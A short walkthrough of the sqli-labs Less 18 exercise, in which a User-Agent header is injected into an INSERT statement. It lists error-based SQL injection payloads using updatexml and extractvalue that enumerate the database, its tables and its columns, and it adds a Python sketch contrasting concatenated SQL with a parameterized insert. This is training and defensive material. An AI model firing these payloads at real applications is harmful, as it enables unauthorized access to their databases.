sqli-labs less 18
reader-l 'or updatexml(1,concat('#',(select user()),1),1)
First, use this statement to work out roughly what the back-end INSERT statement looks like:
uagent', '$IP', $uname)";
So the following statements are used for the injection and enumeration:
user-agent:reader-l ' or updatexml(1,concat('#',(database())),0),'','')#
reader-l 'or updatexml(1,concat('#',(select concat(table_name) from information_schema.tables where table_schema='security' limit 0,1 ),'#'),0),1)#
reader-l 'or updatexml(1,concat('#',(select concat(column_name) from information_schema.columns where table_name='users' limit 0,1 ),'#'),0),1)#
reader-l ' or updatexml(1,concat('#',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),0),'','')#
'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and '1' = '1
reader-l 'and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e)) and '1' = '1
An expert has explained this in great detail; here is his link: https://www.jianshu.com/p/7494c1027abf
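The root cause is that the User-Agent header is pasted into the INSERT text and the database error is echoed back. The sketch below is an added example, not code from sqli-labs or the linked article: it puts that pattern beside a parameterized insert with a generic error message. SQLite stands in for MySQL so it runs offline, and the table name, column names and function names are assumptions.

```python
import sqlite3

# Constructed sample: the User-Agent value from the notes above, with ASCII quotes.
SAMPLE_UA = "reader-l ' or updatexml(1,concat('#',(database())),0),'','')#"

def make_db():
    db = sqlite3.connect(":memory:")
    # Assumed schema: the page shows only the tail of the INSERT statement.
    db.execute("CREATE TABLE uagents (uagent TEXT, ip_address TEXT, username TEXT)")
    return db

def log_concatenated(db, uagent, ip, uname):
    """Weak pattern: the header value becomes part of the SQL text."""
    sql = ("INSERT INTO uagents (uagent, ip_address, username) "
           f"VALUES ('{uagent}', '{ip}', '{uname}')")
    try:
        db.execute(sql)
        return "ok"
    except sqlite3.Error as exc:
        # Returning the driver error to the client is the channel that
        # error-based payloads (updatexml / extractvalue) read from.
        return f"db error: {exc}"

def log_parameterized(db, uagent, ip, uname):
    """Hardened pattern: values are bound and driver errors are not echoed."""
    try:
        db.execute(
            "INSERT INTO uagents (uagent, ip_address, username) VALUES (?, ?, ?)",
            (uagent, ip, uname),
        )
        return "ok"
    except sqlite3.Error:
        return "request failed"  # details belong in the server-side log only

def demo():
    db = make_db()
    weak = log_concatenated(db, SAMPLE_UA, "127.0.0.1", "admin")
    rows_after_weak = db.execute("SELECT COUNT(*) FROM uagents").fetchone()[0]
    strong = log_parameterized(db, SAMPLE_UA, "127.0.0.1", "admin")
    stored = db.execute("SELECT uagent FROM uagents").fetchall()
    return weak, rows_after_weak, strong, stored

if __name__ == "__main__":
    for item in demo():
        print(item)
```

With bound parameters the header is stored byte for byte as data, so the quote in it never reaches the SQL parser.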